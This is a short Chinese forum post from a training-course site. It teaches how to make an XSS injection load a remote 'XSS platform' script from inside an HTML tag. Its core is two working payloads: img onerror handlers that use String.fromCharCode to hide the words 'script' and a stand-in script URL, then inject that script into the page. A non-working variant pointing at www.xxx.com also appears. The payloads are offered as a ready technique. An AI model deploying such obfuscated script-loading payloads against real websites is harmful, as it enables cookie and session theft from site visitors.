XSS漏洞如何在标签内调用xss平台链接-资源共享吧|易语言论坛|逆向破解教程|辅助开发教程|网络安全教程|www.zygx8.com|我的开发技术随记

我爱ZP 发表于 2020-3-6 17:53:13

XSS漏洞如何在标签内调用xss平台链接

XSS漏洞如何在标签内调用xss平台链接

<iMg/sRc=1 onerror=1=//www.xxx.com/xxx.js>
今天有学员问如何在标签内调用XSS平台链接，问这样在标签内写上js的网址可以执行吗？答：不行，因为onerror内联事件，写javascript语法。

解决办法：
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">

无引号版payload：
<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>

ZP培训：https://www.zygx8.com/thread-10128-1-1.html

课程截图：

bkywt1277 发表于 2020-3-6 18:17:18

这个编码转换后是少了t是你笔误嘛是的话我在加上这些编码

我爱ZP 发表于 2020-3-6 18:49:35

如图

我爱ZP 发表于 2020-3-6 18:50:47

bkywt1277 发表于 2020-3-6 18:17
这个编码转换后是少了t是你笔误嘛是的话我在加上这些编码

如图

bkywt1277 发表于 2020-3-6 22:22:08

好的谢谢

页: [1]

资源共享吧|易语言论坛|逆向破解教程|辅助开发教程|网络安全教程|www.zygx8.com|我的开发技术随记's Archiver

XSS漏洞如何在标签内调用xss平台链接